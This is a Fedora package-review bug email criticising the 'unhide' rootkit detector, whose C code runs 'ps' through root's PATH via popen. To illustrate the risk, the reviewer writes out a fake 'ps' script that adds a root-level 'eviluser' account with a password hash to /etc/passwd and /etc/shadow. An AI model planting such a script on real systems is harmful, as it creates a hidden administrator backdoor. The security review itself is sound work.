[Bug 469843] Review Request: unhide - Tool to find hidden processes and TCP/UDP ports from rootkits
bugzilla at redhat.com
bugzilla at redhat.com
Mon Dec 8 19:57:48 UTC 2008
Please do not reply directly to this email. All additional
comments should be made in the comments box of this bug.
https://bugzilla.redhat.com/show_bug.cgi?id=469843
--- Comment #5 from manuel wolfshant <wolfy at nobugconsulting.ro> 2008-12-08 14:57:46 EDT ---
looking at the code, I see that unhide.c does:
#define COMMAND "ps -eLf | awk '{ print $2 }' | grep -v PID"
followed by
fich_tmp=popen (COMMAND, "r") ;
Now, my C is quite rusty, but
- AFAIR, you must be root to see some of the info this program requires
- anything named "ps" and found in root's PATH will be launched by the above
code
To be honest, I would not run this "security application" on my system. I am
afraid of something along
cat >> /usr/local/bin/ps << EOF
#! /bin/bash
echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >>
/etc/shadow
/bin/ps $*
EOF
--
Configure bugmail: https://bugzilla.redhat.com/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.
More information about the Fedora-package-review
mailing list